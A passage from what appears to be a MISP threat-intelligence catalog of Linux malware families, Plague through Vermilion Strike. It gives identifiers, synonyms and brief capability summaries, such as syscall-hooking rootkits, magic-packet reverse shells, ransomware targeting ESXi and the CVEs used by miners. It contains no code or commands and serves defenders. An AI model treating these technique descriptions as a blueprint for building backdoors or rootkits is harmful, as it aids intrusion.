Internal MISP references

UUID 47988844-818c-4a59-a089-fdd6c10e7a3c which can be used as unique global reference for Plague in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PLEAD (ELF)

Internal MISP references

UUID de3c14aa-f9f4-4071-8e6e-a2c16a3394ad which can be used as unique global reference for PLEAD (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PolarEdge

According to Sekoia, this is a form of TLS backdoor containing pre-defined commands. Their investigation initially identified Cisco routers as a target but they also uncovered other payloads from the same family, but targeting different devices, notably Asus, QNAP and Synology. A working hypothesis suggests that devices compromised with PolarEdge could be used as Operational Relay Boxes (ORB) to facilitate offensive cyber operations.

Internal MISP references

UUID 30e97f5e-69d8-48f4-93b9-cc0a33de7db6 which can be used as unique global reference for PolarEdge in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Poseidon (ELF)

Part of Mythic C2, written in Golang.

Internal MISP references

UUID ad796632-2595-4ae5-a563-b92197210d61 which can be used as unique global reference for Poseidon (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PRISM

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PRISM.

Known Synonyms
waterdrop
Internal MISP references

UUID 9a4a866b-84a9-4778-8de8-2780a27c0597 which can be used as unique global reference for PRISM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PrivetSanya

Black Lotus Labs identified malware for the Windows Subsystem for Linux (WSL). Mostly written in Python but compiled as Linux ELF files.

Internal MISP references

UUID 41e5aafb-5847-421e-813d-627414ee31bb which can be used as unique global reference for PrivetSanya in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Prometei (ELF)

Internal MISP references

UUID b6899bda-54e9-4953-8af5-22af39776b69 which can be used as unique global reference for Prometei (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Pro-Ocean

Unit 42 describes this as a malware used by Rocke Group that deploys an XMRig miner.

Internal MISP references

UUID aa918c10-e5c7-4abd-b8c0-3c938a6675f5 which can be used as unique global reference for Pro-Ocean in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PumaBot

Internal MISP references

UUID 5b7cb40f-38c3-4741-a288-e3b3b62ee2ae which can be used as unique global reference for PumaBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PUMAKIT

According to Elastic, PUMAKIT is a sophisticated loadable kernel module (LKM) rootkit that employs advanced stealth mechanisms to hide its presence and maintain communication with command-and-control servers.

The rootkit component, referenced by the malware authors as “PUMA", employs an internal Linux function tracer (ftrace) to hook 18 different syscalls and several kernel functions, enabling it to manipulate core system behaviors. Unique methods are used to interact with PUMA, including using the rmdir() syscall for privilege escalation and specialized commands for extracting configuration and runtime information.

Key functionalities of the kernel module include privilege escalation, hiding files and directories, concealing itself from system tools, anti-debugging measures, and establishing communication with command-and-control (C2) servers.

There is also an accompanying userland SO rootkit internally referred to as Kitsune.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PUMAKIT.

Known Synonyms
Kitsune
PUMA
Internal MISP references

UUID 8e589764-4941-4078-a793-71c0a19b2d9f which can be used as unique global reference for PUMAKIT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

pupy (ELF)

Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.

Internal MISP references

UUID 92a1288f-cc4d-47ca-8399-25fe5a39cf2d which can be used as unique global reference for pupy (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PWNLNX

Internal MISP references

UUID 401ebc95-1d41-4712-94ad-8d8993814d3d which can be used as unique global reference for PWNLNX in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Qilin

Qilin ransomware, initially observed in July 2022 under the name “Agenda,” operates on a Ransomware-as-a-Service (RaaS) model. This model allows core developers to provide their malicious software and infrastructure to affiliates in exchange for a percentage of the profits generated from attacks. The name “Qilin” references a Chinese mythological creature symbolizing power and prosperity, a fitting metaphor for the group’s perceived influence and financial objectives. Despite the Chinese name, the group is linked to Russian-speaking cybercriminals, often recruiting affiliates on Russian-language forums and notably excluding Commonwealth of Independent States (CIS) countries from its targets.

Internal MISP references

UUID d97af6c5-640f-46b4-943c-0e8940f8011e which can be used as unique global reference for Qilin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

QNAPCrypt

The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:

  1. The ransom note was included solely as a text file, without any message on the screen—naturally, because it is a server and not an endpoint.

  2. Every victim is provided with a different, unique Bitcoin wallet—this could help the attackers avoid being traced.

  3. Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QNAPCrypt.

Known Synonyms
eCh0raix
Internal MISP references

UUID a0b12e5f-0257-41f1-beda-001ad944c4ca which can be used as unique global reference for QNAPCrypt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

QSnatch

The malware infects QNAP NAS devices, is persisting via various mechanisms and resists cleaning by preventing firmware updates and interfering with QNAP MalwareRemover. The malware steals passwords and hashes

Internal MISP references

UUID 48389957-30e2-4747-b4c6-8b8a9f15250f which can be used as unique global reference for QSnatch in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

QUIETEXIT

Mandiant observed this backdoor being observed by UNC3524. It is based on the open-source Dropbear SSH source code.

Internal MISP references

UUID 6a5ab9ca-944c-4187-bdef-308516745d18 which can be used as unique global reference for QUIETEXIT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

r2r2

Internal MISP references

UUID 759f8590-a049-4c14-be8a-e6605e2cd43d which can be used as unique global reference for r2r2 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RagnarLocker (ELF)

Internal MISP references

UUID 5f96787e-fc9f-486b-a15f-f46c8179a4d5 which can be used as unique global reference for RagnarLocker (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Rakos

Internal MISP references

UUID 4592384c-48a7-4e16-b492-7add50a7d2f5 which can be used as unique global reference for Rakos in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RansomEXX (ELF)

According to SentineOne, RansomEXX (aka Defray, Defray777), a multi-pronged extortion threat, has been observed in the wild since late 2020. RansomEXX is associated with attacks against the Texas Department of Transportation, Groupe Atlantic, and several other large enterprises. There are Windows and Linux variants of this malware family, and they are known for their limited and exclusive targeting.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RansomEXX (ELF).

Known Synonyms
Defray777
Internal MISP references

UUID 946814a1-957c-48ce-9068-fdef24a025bf which can be used as unique global reference for RansomEXX (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RansomExx2

According to IBM Security X-Force, this is a new but functionally very similar version of RansomExx, fully rewritten in Rust and internally referred to as RansomExx2.

Internal MISP references

UUID c6d750d5-fa47-4fcb-9d24-2682036fc6e5 which can be used as unique global reference for RansomExx2 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RapperBot

A Mirai derivate bruteforcing SSH servers.

Internal MISP references

UUID 914c94eb-38e2-4cb8-a62b-21fbe9c48496 which can be used as unique global reference for RapperBot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RaspberryPiBotnet

Internal MISP references

UUID 8dee025b-2233-4cd8-af02-fcdcd40b378f which can be used as unique global reference for RaspberryPiBotnet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

rat_hodin

Internal MISP references

UUID 6aacf515-de49-4afc-a135-727c9beaab0b which can be used as unique global reference for rat_hodin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

rbs_srv

Internal MISP references

UUID a08d9f8b-2cc5-48c2-8cce-ee713bcdc4b7 which can be used as unique global reference for rbs_srv in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RedTail

RedTail is a cryptomining malware, which is based on the open-source XMRIG mining software. It is being spread via known vulnerabilities such as: - CVE-2024-3400 - CVE-2023-46805 - CVE-2024-21887 - CVE-2023-1389 - CVE-2022-22954 - CVE-2018-20062

Internal MISP references

UUID ba89a509-ff8e-446b-867c-7f15efe0477f which can be used as unique global reference for RedTail in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RedXOR

RedXOR is a sophisticated backdoor targeting Linux systems disguised as polkit daemon and utilizing network data encoding based on XOR. Believed to be developed by Chinese nation-state actors, this malware shows similarities to other malware associated with the Winnti umbrella threat group.

RedXOR uses various techniques such as open-source LKM rootkits, Python pty shell, and network data encoding with XOR. It also employs persistence methods and communication with a Command and Control server over HTTP.

The malware can execute various commands including system information collection, updates, shell commands, and network tunneling.

Internal MISP references

UUID 421b2ec7-d4e6-4fc8-9bd3-55fe26337aae which can be used as unique global reference for RedXOR in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RedAlert Ransomware

Ransomware that targets Linux VMware ESXi servers. Encryption procedure uses the NTRUEncrypt public-key encryption algorithm.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RedAlert Ransomware.

Known Synonyms
N13V
Internal MISP references

UUID 12137c8d-d3f4-44fe-b25e-2fb5f90cecce which can be used as unique global reference for RedAlert Ransomware in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Rekoobe

A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan’s configuration data is stored in a file encrypted with XOR algorithm.

Some versions have there configuration stored within the .data section using RC4 to encrypt the details.

Configuration options include C2 IP and Port, as well as defence evasion details for changing the process name.

Internal MISP references

UUID 48b9a9fd-4c1a-428a-acc0-40b1a3fa7590 which can be used as unique global reference for Rekoobe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

reptile

Internal MISP references

UUID 934478a1-1243-4c26-8360-be3d01ae193e which can be used as unique global reference for reptile in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

REvil (ELF)

ELF version of win.revil targeting VMware ESXi hypervisors.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular REvil (ELF).

Known Synonyms
REvix
Internal MISP references

UUID d9d76456-01a3-4dcd-afc2-87529e00c1ba which can be used as unique global reference for REvil (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Rex

Internal MISP references

UUID 49639ff5-e0be-4b6a-850b-d5d8dd37e62b which can be used as unique global reference for Rex in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RHOMBUS

Internal MISP references

UUID af886910-9a0b-478e-b53d-54c8a103acb4 which can be used as unique global reference for RHOMBUS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Rhysida (ELF)

Internal MISP references

UUID 1dbd7cbb-960d-4ef4-9520-1748fb7cd4c6 which can be used as unique global reference for Rhysida (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Roboto

P2P Botnet discovered by Netlab360. The botnet infects linux servers via the Webmin RCE vulnerability (CVE-2019-15107) which allows attackers to run malicious code with root privileges and take over older Webmin versions. Based on the Netlabs360 analysis, the botnet serves mainly 7 functions: reverse shell, self-uninstall, gather process' network information, gather Bot information, execute system commands, run encrypted files specified in URLs and four DDoS attack methods: ICMP Flood, HTTP Flood, TCP Flood, and UDP Flood.

Internal MISP references

UUID e18bf514-b978-4bef-b4d9-834a5100fced which can be used as unique global reference for Roboto in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RotaJakiro

RotaJakiro is a stealthy Linux backdoor which remained undetected between 2018 and 2021. The malware uses rotating encryption to encrypt the resource information within the sample, and C2 communication, using a combination of AES, XOR, ROTATE encryption and ZLIB compression.

Internal MISP references

UUID 66fb7b48-60f2-44fc-9cbe-f70e776d058b which can be used as unique global reference for RotaJakiro in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Royal Ransom (ELF)

According to Trendmicro, Royal ransomware was first observed in September 2022, and the threat actors behind it are believed to be seasoned cybercriminals who used to be part of Conti Team One.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Royal Ransom (ELF).

Known Synonyms
Royal
Royal_unix
Internal MISP references

UUID 4e29dae1-5a8c-4b3c-81dc-dcc0fdd3c93a which can be used as unique global reference for Royal Ransom (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Rshell

Internal MISP references

UUID 4947e9d3-aa13-4359-ac43-c1c436c409c9 which can be used as unique global reference for Rshell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RudeDevil

Internal MISP references

UUID 923ee959-4ea5-46c5-8926-84e41ca77ca4 which can be used as unique global reference for RudeDevil in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SALTWATER

According to Mandiant, SALTWATER is a module for the Barracuda SMTP daemon (bsmtpd) that has backdoor functionality. SALTWATER can upload or download arbitrary files, execute commands, and has proxy and tunneling capabilities. The backdoor is implemented using hooks on the send, recv, close syscalls via the 3rd party kubo/funchook hooking library, and amounts to five components, most of which are referred to as "Channels" within the binary. In addition to providing backdoor and proxying capabilities, these components exhibit classic backdoor functionality.

Internal MISP references

UUID d55ea436-b2c1-400c-99dc-6e35bc05438b which can be used as unique global reference for SALTWATER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Satori

Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).

Internal MISP references

UUID 9e5d83a8-1181-43fe-a77f-28c8c75ffbd0 which can be used as unique global reference for Satori in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SBIDIOT

Internal MISP references

UUID b4c20cf4-8e94-4523-8d48-7781aab6785d which can be used as unique global reference for SBIDIOT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SEASPY

According to CISA, this malware is a persistent backdoor that masquerades as a legitimate Barracuda Networks service. The malware is designed to listen to commands received from the Threat Actor’s Command-and-Control through TCP packets. When executed, the malware uses libpcap sniffer to monitor traffic for a magic packet on TCP port 25 (SMTP) and TCP port 587. It checks the network packet captured for a hard-coded string. When the right sequence of packet is captured, it establishes a TCP reverse shell to the C2 server for further exploitation. This allows the TA to execute arbitrary commands on the compromised system. The malware is based on an open-source backdoor program named "cd00r".

Internal MISP references

UUID a6699c42-69d8-4bdd-8dd9-72f4c80efefa which can be used as unique global reference for SEASPY in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SECONDDATE

Internal MISP references

UUID 6d864834-cc92-47ea-b2b5-7fe6331953d7 which can be used as unique global reference for SECONDDATE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

sedexp

Internal MISP references

UUID 4e71e8ab-a34a-494f-814d-cc983a2de463 which can be used as unique global reference for sedexp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SEXi

Ransomware, likely based on the leaked Babuk source code.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SEXi.

Known Synonyms
Formosa
Limpopo
Socotra
Internal MISP references

UUID 455156e4-57ca-45c7-bed8-a2c386aa0d5e which can be used as unique global reference for SEXi in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ShadowV2

According to Fortinet, this is a Mirai fork propagating through multiple vulnerabilities. ShadowV2 had previously been observed targeting AWS EC2 instances in campaigns disclosed in September 2025.

Internal MISP references

UUID 57d0498e-a0a1-4c04-8348-894e2851dc00 which can be used as unique global reference for ShadowV2 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ShellBind

Internal MISP references

UUID b51caf06-736e-46fc-9b13-48b0b81df4b7 which can be used as unique global reference for ShellBind in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Shishiga

Internal MISP references

UUID 51da734c-70dd-4337-ab08-ab61457e0da5 which can be used as unique global reference for Shishiga in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

ShortLeash (ELF)

According to STRIKE, ShortLeash is a custom backdoor used to create an ORB network. It generates unique, self-signed TLS certificates with spoofed metadata for each node. Analysis of these certificates revealed over 1000 active nodes globally and victimology supports attribution to China-Nexus APTs.

Internal MISP references

UUID 396324ad-c2ed-4379-a248-d6f0a1f0510a which can be used as unique global reference for ShortLeash (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SideWalk (ELF)

Internal MISP references

UUID ec994efc-a8a4-4e92-ada2-e37d421baf01 which can be used as unique global reference for SideWalk (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Silex

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Silex.

Known Synonyms
silexbot
Internal MISP references

UUID bf059cb4-f73a-4181-bf71-d8da7bf50dd8 which can be used as unique global reference for Silex in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SimpleTea (ELF)

SimpleTea for Linux is an HTTP(S) RAT.

It was discovered in Q1 2023 as an instance of the Lazarus group's Operation DreamJob campaign for Linux. It was a payload downloaded in an execution chain which started with an HSBC-themed job offer lure. It shared the same C&C server as payloads from the 3CX incident around the same time.

It’s an object-oriented project, which does not run on Linux distributions without a graphical user interface, and decrypts its configuration from /home/%user%/.config/apdl.cf using 0x7E as the XOR key. It uses AES-GCM for encryption and decryption of its network traffic.

It supports basic commands that include operations on the victim’s filesystem, manipulation with its configuration, file exfiltration (via ZIP archives), and the download and execution of additional tools from the attacker’s arsenal. The commands are indexed by 16-bit integers, starting with the value 0x27C3.

SimpleTea for Linux seems like an updated version of BadCall for Linux, rewritten from C to C++, as there are similarities in class names and function names between the two.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SimpleTea (ELF).

Known Synonyms
PondRAT
SimplexTea
Internal MISP references

UUID e8695701-8055-4b98-bcb6-e4bb7e0a3346 which can be used as unique global reference for SimpleTea (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Sindoor

Internal MISP references

UUID 459c13d0-d206-4b97-8059-1449c9fa3991 which can be used as unique global reference for Sindoor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SLAPSTICK

According to FireEye, SLAPSTICK is a Solaris PAM backdoor that grants a user access to the system with a secret, hard-coded password.

Internal MISP references

UUID fb3e0a1d-3a98-4cbd-ad7f-4bbb4b9a8351 which can be used as unique global reference for SLAPSTICK in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SnappyTCP

According to PwC, SnappyTCP is a simple reverse shell for Linux/Unix systems, with variants for plaintext and TLS communication. SeaTurtle has used SnappyTCP at least between 2021 and 2023.

Internal MISP references

UUID 72e045be-eba2-4571-9c6e-7d35add3d2f8 which can be used as unique global reference for SnappyTCP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SNOWLIGHT

According to sysdig, SNOWLIGHT is used as a dropper for its fileless payload (vshell).

Internal MISP references

UUID e108e4df-5429-402c-b70a-4fa022093598 which can be used as unique global reference for SNOWLIGHT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SoWaT

This is an implant used by APT31 on home routers to utilize them as ORBs.

Internal MISP references

UUID c2866996-d622-4ee2-b548-a6598836e5ae which can be used as unique global reference for SoWaT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Spamtorte

Internal MISP references

UUID 7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0 which can be used as unique global reference for Spamtorte in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SPAWNSNARE

According to Mandiant, this is a utility that is written in C and targets Linux. It can be used to extract the uncompressed linux kernel image (vmlinux) into a file and encrypt it using AES without the need for any command line tools.

Internal MISP references

UUID bbcfc37c-0d5c-455e-88f9-3de2df391986 which can be used as unique global reference for SPAWNSNARE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SpeakUp

Internal MISP references

UUID 3ccd3143-c34d-4680-94b9-2cc4fa4f86fa which can be used as unique global reference for SpeakUp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Specter

Internal MISP references

UUID b9ed5797-b591-4ca9-ba77-ce86308e333a which can be used as unique global reference for Specter in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SpectralBlur (ELF)

Internal MISP references

UUID a14e7ea4-668c-4990-a1a9-be99722f88f7 which can be used as unique global reference for SpectralBlur (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Speculoos

Internal MISP references

UUID df23ae3a-e10d-4c49-b379-2ea2fd1925af which can be used as unique global reference for Speculoos in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SprySOCKS

Internal MISP references

UUID 3b5c485b-b6a6-4586-a7dc-9e23a3b0aa5a which can be used as unique global reference for SprySOCKS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Sshdinjector

Internal MISP references

UUID 961ba66e-31de-4dcf-bbb3-27c30f404969 which can be used as unique global reference for Sshdinjector in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SSHDoor

Internal MISP references

UUID 275d65b9-0894-4c9b-a255-83daddb2589c which can be used as unique global reference for SSHDoor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Stantinko

Internal MISP references

UUID e8c131df-ee3b-41d4-992d-71d3090d2d98 which can be used as unique global reference for Stantinko in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

STEELCORGI

According to FireEye, STEELCORGI is a packer for Linux ELF files that makes use of execution guardrails by sourcing decryption key material from environment variables.

Internal MISP references

UUID 21ff33b5-ef21-4263-8747-7de3d2dbdde6 which can be used as unique global reference for STEELCORGI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Sunless

Internal MISP references

UUID d03fa69b-53a4-4f61-b800-87e4246d2656 which can be used as unique global reference for Sunless in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

sustes miner

Sustes Malware doesn’t infect victims by itself (it’s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software.

Internal MISP references

UUID 5c117b01-826b-4656-b6ca-8b18b6e6159f which can be used as unique global reference for sustes miner in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Suterusu

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Suterusu.

Known Synonyms
HCRootkit
Internal MISP references

UUID d2748a0c-8739-4006-95c4-bdf6350d7fa9 which can be used as unique global reference for Suterusu in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Sword2033

Internal MISP references

UUID 9c1a32c7-45b4-4d3a-9d15-300b353f32a7 which can be used as unique global reference for Sword2033 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Symbiote

A malware capable of capturing credentials and enabling backdoor access, implemented as a userland rootkit. It uses three methods for hiding its network activity, by hooking and hijacking 1) fopen/fopen64, 2) eBPF, 3) a set of libpcap functions.

Internal MISP references

UUID 4339d876-768c-4cdf-941f-3f55a08aafca which can be used as unique global reference for Symbiote in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SysJoker (ELF)

Internal MISP references

UUID c4b681ec-f5b5-433a-9314-07e06f739ba2 which can be used as unique global reference for SysJoker (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Sysrv-hello (ELF)

Cryptojacking botnet

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sysrv-hello (ELF).

Known Synonyms
Sysrv
Internal MISP references

UUID d471083a-c8e1-4d9b-907e-685c9a75c1f9 which can be used as unique global reference for Sysrv-hello (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SystemBC (ELF)

Internal MISP references

UUID 20de6d31-634d-4723-959d-4ced5bb03dc5 which can be used as unique global reference for SystemBC (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

TeamTNT

Since Fall 2019, Team TNT is a well known threat actor which targets *nix based systems and misconfigured Docker container environments. It has constantly evolved its capabilities for its cloud-based cryptojacking operations. They have shifted their focus on compromising Kubernetes Clusters.

Internal MISP references

UUID 24695f84-d3af-477e-92dd-c05c9536ebf5 which can be used as unique global reference for TeamTNT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

TheMoon

Internal MISP references

UUID ed098719-797b-4cb3-a73c-65b6d08ebdfa which can be used as unique global reference for TheMoon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

TNTbotinger

Internal MISP references

UUID 00319b53-e31c-4623-a3ac-9a18bc52bf36 which can be used as unique global reference for TNTbotinger in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Torii

Internal MISP references

UUID a874575e-0ad7-464d-abb6-8f4b7964aa92 which can be used as unique global reference for Torii in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

TripleCross

According to its author, TripleCross is a Linux eBPF rootkit that demonstrates the offensive capabilities of the eBPF technology.

Internal MISP references

UUID a462c60d-a7f9-4a05-aaa1-be415870310e which can be used as unique global reference for TripleCross in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Trump Bot

Internal MISP references

UUID feb6a5f6-32f9-447d-af9c-08e499457883 which can be used as unique global reference for Trump Bot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

TSCookie

Internal MISP references

UUID 592f7cc6-1e07-4d83-8082-aef027e9f1e2 which can be used as unique global reference for TSCookie in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

tsh

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular tsh.

Known Synonyms
TINYSHELL
Internal MISP references

UUID 95a07de2-0e17-48a7-b935-0c1c0c0e39af which can be used as unique global reference for tsh in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Tsunami (ELF)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Tsunami (ELF).

Known Synonyms
Amnesia
Muhstik
Radiation
Internal MISP references

UUID 21540126-d0bb-42ce-9b93-341fedb94cac which can be used as unique global reference for Tsunami (ELF) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Turla RAT

Internal MISP references

UUID 1b62a421-c0db-4425-bcb2-a4925d5d33e0 which can be used as unique global reference for Turla RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Umbreon

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Umbreon.

Known Synonyms
Espeon
Internal MISP references

UUID 637000f7-4363-44e0-b795-9cfb7a3dc460 which can be used as unique global reference for Umbreon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified Linux 001

According to Cybereason, these scripts have been used in an ongoing campaign exploiting a widespread vulnerability in the Exim MTA: CVE-2019-10149. This attack leverages a week-old vulnerability to gain remote command execution on the target machine, search the Internet for other machines to infect, and initiates a crypto miner.

Internal MISP references

UUID b5b59d9f-f9e2-4201-a017-f2bae0470808 which can be used as unique global reference for Unidentified Linux 001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified ELF 004

Implant used by APT31 on compromised SOHO infrastructure, tries to camouflage as a tool ("unifi-video") related to Ubiquiti UniFi surveillance cameras.

Internal MISP references

UUID 44a57915-2ec0-476f-9f20-b11082f5b5a4 which can be used as unique global reference for Unidentified ELF 004 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified 005 (Sidecopy)

Internal MISP references

UUID d49402b3-9f2a-4d9a-ae09-b1509da2e8fd which can be used as unique global reference for Unidentified 005 (Sidecopy) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Unidentified ELF 006 (Tox Backdoor)

Enables remote execution of scripts on a host, communicates via Tox.

Internal MISP references

UUID 61a36688-0a4f-4899-8b17-ca0d5ff7e800 which can be used as unique global reference for Unidentified ELF 006 (Tox Backdoor) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Hive (Vault 8)

Internal MISP references

UUID 721fa6d1-da73-4dd4-9154-a60ff4607467 which can be used as unique global reference for Hive (Vault 8) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Vermilion Strike (ELF)

Internal MISP references

